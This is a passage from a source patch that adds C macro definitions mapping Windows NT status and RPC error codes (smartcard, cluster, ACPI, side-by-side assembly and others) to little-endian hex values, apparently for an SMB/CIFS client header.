++#define STATUS_SMARTCARD_NO_CARD cpu_to_le32(0xC0000383)
++#define STATUS_SMARTCARD_NO_KEY_CONTAINER cpu_to_le32(0xC0000384)
++#define STATUS_SMARTCARD_NO_CERTIFICATE cpu_to_le32(0xC0000385)
++#define STATUS_SMARTCARD_NO_KEYSET cpu_to_le32(0xC0000386)
++#define STATUS_SMARTCARD_IO_ERROR cpu_to_le32(0xC0000387)
++#define STATUS_DOWNGRADE_DETECTED cpu_to_le32(0xC0000388)
++#define STATUS_SMARTCARD_CERT_REVOKED cpu_to_le32(0xC0000389)
++#define STATUS_ISSUING_CA_UNTRUSTED cpu_to_le32(0xC000038A)
++#define STATUS_REVOCATION_OFFLINE_C cpu_to_le32(0xC000038B)
++#define STATUS_PKINIT_CLIENT_FAILURE cpu_to_le32(0xC000038C)
++#define STATUS_SMARTCARD_CERT_EXPIRED cpu_to_le32(0xC000038D)
++#define STATUS_DRIVER_FAILED_PRIOR_UNLOAD cpu_to_le32(0xC000038E)
++#define STATUS_SMARTCARD_SILENT_CONTEXT cpu_to_le32(0xC000038F)
++#define STATUS_PER_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000401)
++#define STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000402)
++#define STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED cpu_to_le32(0xC0000403)
++#define STATUS_DS_NAME_NOT_UNIQUE cpu_to_le32(0xC0000404)
++#define STATUS_DS_DUPLICATE_ID_FOUND cpu_to_le32(0xC0000405)
++#define STATUS_DS_GROUP_CONVERSION_ERROR cpu_to_le32(0xC0000406)
++#define STATUS_VOLSNAP_PREPARE_HIBERNATE cpu_to_le32(0xC0000407)
++#define STATUS_USER2USER_REQUIRED cpu_to_le32(0xC0000408)
++#define STATUS_STACK_BUFFER_OVERRUN cpu_to_le32(0xC0000409)
++#define STATUS_NO_S4U_PROT_SUPPORT cpu_to_le32(0xC000040A)
++#define STATUS_CROSSREALM_DELEGATION_FAILURE cpu_to_le32(0xC000040B)
++#define STATUS_REVOCATION_OFFLINE_KDC cpu_to_le32(0xC000040C)
++#define STATUS_ISSUING_CA_UNTRUSTED_KDC cpu_to_le32(0xC000040D)
++#define STATUS_KDC_CERT_EXPIRED cpu_to_le32(0xC000040E)
++#define STATUS_KDC_CERT_REVOKED cpu_to_le32(0xC000040F)
++#define STATUS_PARAMETER_QUOTA_EXCEEDED cpu_to_le32(0xC0000410)
++#define STATUS_HIBERNATION_FAILURE cpu_to_le32(0xC0000411)
++#define STATUS_DELAY_LOAD_FAILED cpu_to_le32(0xC0000412)
++#define STATUS_AUTHENTICATION_FIREWALL_FAILED cpu_to_le32(0xC0000413)
++#define STATUS_VDM_DISALLOWED cpu_to_le32(0xC0000414)
++#define STATUS_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC0000415)
++#define STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE	\
++	cpu_to_le32(0xC0000416)
++#define STATUS_INVALID_CRUNTIME_PARAMETER cpu_to_le32(0xC0000417)
++#define STATUS_NTLM_BLOCKED cpu_to_le32(0xC0000418)
++#define STATUS_ASSERTION_FAILURE cpu_to_le32(0xC0000420)
++#define STATUS_VERIFIER_STOP cpu_to_le32(0xC0000421)
++#define STATUS_CALLBACK_POP_STACK cpu_to_le32(0xC0000423)
++#define STATUS_INCOMPATIBLE_DRIVER_BLOCKED cpu_to_le32(0xC0000424)
++#define STATUS_HIVE_UNLOADED cpu_to_le32(0xC0000425)
++#define STATUS_COMPRESSION_DISABLED cpu_to_le32(0xC0000426)
++#define STATUS_FILE_SYSTEM_LIMITATION cpu_to_le32(0xC0000427)
++#define STATUS_INVALID_IMAGE_HASH cpu_to_le32(0xC0000428)
++#define STATUS_NOT_CAPABLE cpu_to_le32(0xC0000429)
++#define STATUS_REQUEST_OUT_OF_SEQUENCE cpu_to_le32(0xC000042A)
++#define STATUS_IMPLEMENTATION_LIMIT cpu_to_le32(0xC000042B)
++#define STATUS_ELEVATION_REQUIRED cpu_to_le32(0xC000042C)
++#define STATUS_BEYOND_VDL cpu_to_le32(0xC0000432)
++#define STATUS_ENCOUNTERED_WRITE_IN_PROGRESS cpu_to_le32(0xC0000433)
++#define STATUS_PTE_CHANGED cpu_to_le32(0xC0000434)
++#define STATUS_PURGE_FAILED cpu_to_le32(0xC0000435)
++#define STATUS_CRED_REQUIRES_CONFIRMATION cpu_to_le32(0xC0000440)
++#define STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE cpu_to_le32(0xC0000441)
++#define STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER cpu_to_le32(0xC0000442)
++#define STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE cpu_to_le32(0xC0000443)
++#define STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE cpu_to_le32(0xC0000444)
++#define STATUS_CS_ENCRYPTION_FILE_NOT_CSE cpu_to_le32(0xC0000445)
++#define STATUS_INVALID_LABEL cpu_to_le32(0xC0000446)
++#define STATUS_DRIVER_PROCESS_TERMINATED cpu_to_le32(0xC0000450)
++#define STATUS_AMBIGUOUS_SYSTEM_DEVICE cpu_to_le32(0xC0000451)
++#define STATUS_SYSTEM_DEVICE_NOT_FOUND cpu_to_le32(0xC0000452)
++#define STATUS_RESTART_BOOT_APPLICATION cpu_to_le32(0xC0000453)
++#define STATUS_INVALID_TASK_NAME cpu_to_le32(0xC0000500)
++#define STATUS_INVALID_TASK_INDEX cpu_to_le32(0xC0000501)
++#define STATUS_THREAD_ALREADY_IN_TASK cpu_to_le32(0xC0000502)
++#define STATUS_CALLBACK_BYPASS cpu_to_le32(0xC0000503)
++#define STATUS_PORT_CLOSED cpu_to_le32(0xC0000700)
++#define STATUS_MESSAGE_LOST cpu_to_le32(0xC0000701)
++#define STATUS_INVALID_MESSAGE cpu_to_le32(0xC0000702)
++#define STATUS_REQUEST_CANCELED cpu_to_le32(0xC0000703)
++#define STATUS_RECURSIVE_DISPATCH cpu_to_le32(0xC0000704)
++#define STATUS_LPC_RECEIVE_BUFFER_EXPECTED cpu_to_le32(0xC0000705)
++#define STATUS_LPC_INVALID_CONNECTION_USAGE cpu_to_le32(0xC0000706)
++#define STATUS_LPC_REQUESTS_NOT_ALLOWED cpu_to_le32(0xC0000707)
++#define STATUS_RESOURCE_IN_USE cpu_to_le32(0xC0000708)
++#define STATUS_HARDWARE_MEMORY_ERROR cpu_to_le32(0xC0000709)
++#define STATUS_THREADPOOL_HANDLE_EXCEPTION cpu_to_le32(0xC000070A)
++#define STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED cpu_to_le32(0xC000070B)
++#define STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070C)
++#define STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070D)
++#define STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED	\
++	cpu_to_le32(0xC000070E)
++#define STATUS_THREADPOOL_RELEASED_DURING_OPERATION cpu_to_le32(0xC000070F)
++#define STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000710)
++#define STATUS_APC_RETURNED_WHILE_IMPERSONATING cpu_to_le32(0xC0000711)
++#define STATUS_PROCESS_IS_PROTECTED cpu_to_le32(0xC0000712)
++#define STATUS_MCA_EXCEPTION cpu_to_le32(0xC0000713)
++#define STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE cpu_to_le32(0xC0000714)
++#define STATUS_SYMLINK_CLASS_DISABLED cpu_to_le32(0xC0000715)
++#define STATUS_INVALID_IDN_NORMALIZATION cpu_to_le32(0xC0000716)
++#define STATUS_NO_UNICODE_TRANSLATION cpu_to_le32(0xC0000717)
++#define STATUS_ALREADY_REGISTERED cpu_to_le32(0xC0000718)
++#define STATUS_CONTEXT_MISMATCH cpu_to_le32(0xC0000719)
++#define STATUS_PORT_ALREADY_HAS_COMPLETION_LIST cpu_to_le32(0xC000071A)
++#define STATUS_CALLBACK_RETURNED_THREAD_PRIORITY cpu_to_le32(0xC000071B)
++#define STATUS_INVALID_THREAD cpu_to_le32(0xC000071C)
++#define STATUS_CALLBACK_RETURNED_TRANSACTION cpu_to_le32(0xC000071D)
++#define STATUS_CALLBACK_RETURNED_LDR_LOCK cpu_to_le32(0xC000071E)
++#define STATUS_CALLBACK_RETURNED_LANG cpu_to_le32(0xC000071F)
++#define STATUS_CALLBACK_RETURNED_PRI_BACK cpu_to_le32(0xC0000720)
++#define STATUS_CALLBACK_RETURNED_THREAD_AFFINITY cpu_to_le32(0xC0000721)
++#define STATUS_DISK_REPAIR_DISABLED cpu_to_le32(0xC0000800)
++#define STATUS_DS_DOMAIN_RENAME_IN_PROGRESS cpu_to_le32(0xC0000801)
++#define STATUS_DISK_QUOTA_EXCEEDED cpu_to_le32(0xC0000802)
++#define STATUS_CONTENT_BLOCKED cpu_to_le32(0xC0000804)
++#define STATUS_BAD_CLUSTERS cpu_to_le32(0xC0000805)
++#define STATUS_VOLUME_DIRTY cpu_to_le32(0xC0000806)
++#define STATUS_FILE_CHECKED_OUT cpu_to_le32(0xC0000901)
++#define STATUS_CHECKOUT_REQUIRED cpu_to_le32(0xC0000902)
++#define STATUS_BAD_FILE_TYPE cpu_to_le32(0xC0000903)
++#define STATUS_FILE_TOO_LARGE cpu_to_le32(0xC0000904)
++#define STATUS_FORMS_AUTH_REQUIRED cpu_to_le32(0xC0000905)
++#define STATUS_VIRUS_INFECTED cpu_to_le32(0xC0000906)
++#define STATUS_VIRUS_DELETED cpu_to_le32(0xC0000907)
++#define STATUS_BAD_MCFG_TABLE cpu_to_le32(0xC0000908)
++#define STATUS_WOW_ASSERTION cpu_to_le32(0xC0009898)
++#define STATUS_INVALID_SIGNATURE cpu_to_le32(0xC000A000)
++#define STATUS_HMAC_NOT_SUPPORTED cpu_to_le32(0xC000A001)
++#define STATUS_IPSEC_QUEUE_OVERFLOW cpu_to_le32(0xC000A010)
++#define STATUS_ND_QUEUE_OVERFLOW cpu_to_le32(0xC000A011)
++#define STATUS_HOPLIMIT_EXCEEDED cpu_to_le32(0xC000A012)
++#define STATUS_PROTOCOL_NOT_SUPPORTED cpu_to_le32(0xC000A013)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED	\
++	cpu_to_le32(0xC000A080)
++#define STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR	\
++	cpu_to_le32(0xC000A081)
++#define STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR cpu_to_le32(0xC000A082)
++#define STATUS_XML_PARSE_ERROR cpu_to_le32(0xC000A083)
++#define STATUS_XMLDSIG_ERROR cpu_to_le32(0xC000A084)
++#define STATUS_WRONG_COMPARTMENT cpu_to_le32(0xC000A085)
++#define STATUS_AUTHIP_FAILURE cpu_to_le32(0xC000A086)
++#define DBG_NO_STATE_CHANGE cpu_to_le32(0xC0010001)
++#define DBG_APP_NOT_IDLE cpu_to_le32(0xC0010002)
++#define RPC_NT_INVALID_STRING_BINDING cpu_to_le32(0xC0020001)
++#define RPC_NT_WRONG_KIND_OF_BINDING cpu_to_le32(0xC0020002)
++#define RPC_NT_INVALID_BINDING cpu_to_le32(0xC0020003)
++#define RPC_NT_PROTSEQ_NOT_SUPPORTED cpu_to_le32(0xC0020004)
++#define RPC_NT_INVALID_RPC_PROTSEQ cpu_to_le32(0xC0020005)
++#define RPC_NT_INVALID_STRING_UUID cpu_to_le32(0xC0020006)
++#define RPC_NT_INVALID_ENDPOINT_FORMAT cpu_to_le32(0xC0020007)
++#define RPC_NT_INVALID_NET_ADDR cpu_to_le32(0xC0020008)
++#define RPC_NT_NO_ENDPOINT_FOUND cpu_to_le32(0xC0020009)
++#define RPC_NT_INVALID_TIMEOUT cpu_to_le32(0xC002000A)
++#define RPC_NT_OBJECT_NOT_FOUND cpu_to_le32(0xC002000B)
++#define RPC_NT_ALREADY_REGISTERED cpu_to_le32(0xC002000C)
++#define RPC_NT_TYPE_ALREADY_REGISTERED cpu_to_le32(0xC002000D)
++#define RPC_NT_ALREADY_LISTENING cpu_to_le32(0xC002000E)
++#define RPC_NT_NO_PROTSEQS_REGISTERED cpu_to_le32(0xC002000F)
++#define RPC_NT_NOT_LISTENING cpu_to_le32(0xC0020010)
++#define RPC_NT_UNKNOWN_MGR_TYPE cpu_to_le32(0xC0020011)
++#define RPC_NT_UNKNOWN_IF cpu_to_le32(0xC0020012)
++#define RPC_NT_NO_BINDINGS cpu_to_le32(0xC0020013)
++#define RPC_NT_NO_PROTSEQS cpu_to_le32(0xC0020014)
++#define RPC_NT_CANT_CREATE_ENDPOINT cpu_to_le32(0xC0020015)
++#define RPC_NT_OUT_OF_RESOURCES cpu_to_le32(0xC0020016)
++#define RPC_NT_SERVER_UNAVAILABLE cpu_to_le32(0xC0020017)
++#define RPC_NT_SERVER_TOO_BUSY cpu_to_le32(0xC0020018)
++#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
++#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
++#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
++#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
++#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
++#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
++#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
++#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
++#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
++#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
++#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
++#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
++#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
++#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
++#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
++#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
++#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
++#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
++#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
++#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
++#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
++#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
++#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
++#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
++#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
++#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
++#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
++#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
++#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
++#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
++#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
++#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
++#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
++#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
++#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
++#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
++#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
++#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
++#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
++#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
++#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
++#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
++#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
++#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
++#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
++#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
++#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
++#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
++#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
++#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
++#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
++#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
++#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
++#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
++#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
++#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
++#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
++#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
++#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
++#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
++#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
++#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
++#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
++#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
++#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
++#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
++#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
++#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
++#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
++#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
++#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
++#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
++#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
++#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
++#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
++#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
++#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
++#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
++#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
++#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
++#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
++#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
++#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
++#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
++#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
++#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
++#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
++#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
++#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
++#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
++#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
++#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
++#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
++#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
++#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
++#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
++#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
++#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
++#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
++#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
++#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
++#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
++#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
++#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
++#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
++#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
++#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
++#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
++#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
++#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
++#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
++#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
++#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
++#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
++#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
++#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
++#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
++#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
++#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
++#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
++#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
++#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
++#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
++#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
++#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
++#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
++#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
++#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
++#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
++#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
++#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
++#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
++#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
++#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
++#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
++#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
++#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
++#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
++#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
++#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
++#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
++#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
++#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
++#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
++#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
++#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
++#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
++#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
++#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
++#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
++#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
++#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
++#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
++#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
++#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
++#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
++#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
++#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
++#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
++#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
++#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
++#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
++#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
++#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
++#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
++#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
++#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
++#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
++#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
++#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
++#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
++#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
++#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
++#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
++#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
++#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
++#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
++#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
++#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
++#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
++#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
++#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
++#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
++#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
++#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
++#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
++#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
++#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
++#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
++#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
++#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
++#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
++#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
++#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
++#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
++#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
++#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
